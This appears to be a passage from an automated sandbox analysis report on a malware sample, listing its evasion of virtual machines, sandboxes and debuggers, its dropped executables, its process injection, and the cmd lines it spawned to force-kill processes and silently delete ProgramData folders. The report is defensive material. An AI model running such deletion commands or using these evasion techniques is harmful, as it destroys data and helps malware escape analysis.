Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Data\Database.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 9.2.System.exe.29b2f54.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pj31M24DLn.exe.3002f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.247771494.0000000002FD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.308898772.0000000002981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pj31M24DLn.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 6940, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\ProgramData\Data\Database.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\ProgramData\Data\Database.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: pj31M24DLn.exe, 00000001.00000002.247771494.0000000002FD1000.00000004.00000001.sdmp, System.exe, 00000009.00000002.308898772.0000000002981000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: pj31M24DLn.exe, 00000001.00000002.247771494.0000000002FD1000.00000004.00000001.sdmp, System.exe, 00000009.00000002.308898772.0000000002981000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\pj31M24DLn.exe TID: 6308	Thread sleep time: -40731s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe TID: 6384	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe TID: 6584	Thread sleep time: -28800000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe TID: 6584	Thread sleep time: -50400s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe TID: 6584	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe TID: 6944	Thread sleep time: -38084s >= -30000s	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe TID: 6960	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe TID: 5044	Thread sleep time: -25200000s >= -30000s
Source: C:\ProgramData\Microsoft Network\System.exe TID: 5044	Thread sleep time: -36000s >= -30000s

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Thread delayed: delay time: 3600000

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Dropped PE file which has not been started: C:\ProgramData\Systemd\old.exe (copy)
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Dropped PE file which has not been started: C:\ProgramData\Data\old.exe (copy)
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Dropped PE file which has not been started: C:\ProgramData\Data\Database.exe
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Dropped PE file which has not been started: C:\ProgramData\Systemd\Datahub.exe

Source: C:\ProgramData\Data\Database.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\ProgramData\Data\Database.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\ProgramData\Data\Database.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Thread delayed: delay time: 40731	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Thread delayed: delay time: 38084	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Thread delayed: delay time: 3600000

Source: pj31M24DLn.exe, 00000005.00000002.502955928.00000000043E0000.00000002.00000001.sdmp, System.exe, 0000002A.00000002.507122185.00000000049D0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: System.exe, 00000009.00000002.308898772.0000000002981000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: System.exe, 00000009.00000002.308898772.0000000002981000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: System.exe, 00000009.00000002.308898772.0000000002981000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: pj31M24DLn.exe, 00000005.00000002.495847009.0000000001288000.00000004.00000020.sdmp, System.exe, 0000002A.00000002.499229556.0000000001808000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: System.exe, 00000009.00000002.308898772.0000000002981000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: Database.exe, 00000008.00000002.284116824.0000014CD6E37000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTTM
Source: System.exe, 00000009.00000002.308898772.0000000002981000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: pj31M24DLn.exe, 00000005.00000002.502955928.00000000043E0000.00000002.00000001.sdmp, System.exe, 0000002A.00000002.507122185.00000000049D0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: pj31M24DLn.exe, 00000005.00000002.502955928.00000000043E0000.00000002.00000001.sdmp, System.exe, 0000002A.00000002.507122185.00000000049D0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: System.exe, 00000009.00000002.308898772.0000000002981000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: System.exe, 00000009.00000002.308898772.0000000002981000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: System.exe, 00000009.00000002.308898772.0000000002981000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: pj31M24DLn.exe, 00000005.00000002.502955928.00000000043E0000.00000002.00000001.sdmp, System.exe, 0000002A.00000002.507122185.00000000049D0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00422CE4 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	5_2_00422CE4
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00422D04 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	5_2_00422D04
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0043BD1D FindFirstFileExW,	5_2_0043BD1D
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00422CE4 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	42_2_00422CE4
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00422D04 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	42_2_00422D04
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0043BD1D FindFirstFileExW,	42_2_0043BD1D

Source: C:\ProgramData\Data\Database.exe

System information queried: ModuleInformation

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\ProgramData\Data\Database.exe	Open window title or class name: regmonclass
Source: C:\ProgramData\Data\Database.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\Data\Database.exe	Open window title or class name: procmon_window_class
Source: C:\ProgramData\Data\Database.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\Data\Database.exe	Open window title or class name: filemonclass
Source: C:\ProgramData\Data\Database.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Hides threads from debuggers

Source: C:\ProgramData\Data\Database.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\Data\Database.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\Data\Database.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0042F465 mov eax, dword ptr fs:[00000030h]	5_2_0042F465
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0043BA16 mov eax, dword ptr fs:[00000030h]	5_2_0043BA16
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0042F465 mov eax, dword ptr fs:[00000030h]	42_2_0042F465
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0043BA16 mov eax, dword ptr fs:[00000030h]	42_2_0043BA16

Source: C:\ProgramData\Data\Database.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\Data\Database.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\Data\Database.exe	Process queried: DebugObjectHandle	Jump to behavior

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Code function: 5_2_0042423E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_0042423E

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Source: C:\ProgramData\Microsoft Network\System.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_004243A1 SetUnhandledExceptionFilter,	5_2_004243A1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0042423E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_0042423E
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_004236AA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_004236AA
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0042976F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_0042976F
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_004243A1 SetUnhandledExceptionFilter,	42_2_004243A1
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0042423E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_0042423E
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_004236AA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_004236AA
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0042976F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_0042976F

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Memory written: C:\Users\user\Desktop\pj31M24DLn.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Users\user\Desktop\pj31M24DLn.exe C:\Users\user\Desktop\pj31M24DLn.exe	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Datahub.exe /F	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Microsoft Network\System.exe C:\ProgramData\Microsoft Network\System.exe	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Microsoft Network\System.exe C:\ProgramData\Microsoft Network\System.exe	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Microsoft Network\System.exe C:\ProgramData\Microsoft Network\System.exe	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Microsoft Network\System.exe C:\ProgramData\Microsoft Network\System.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Datahub.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
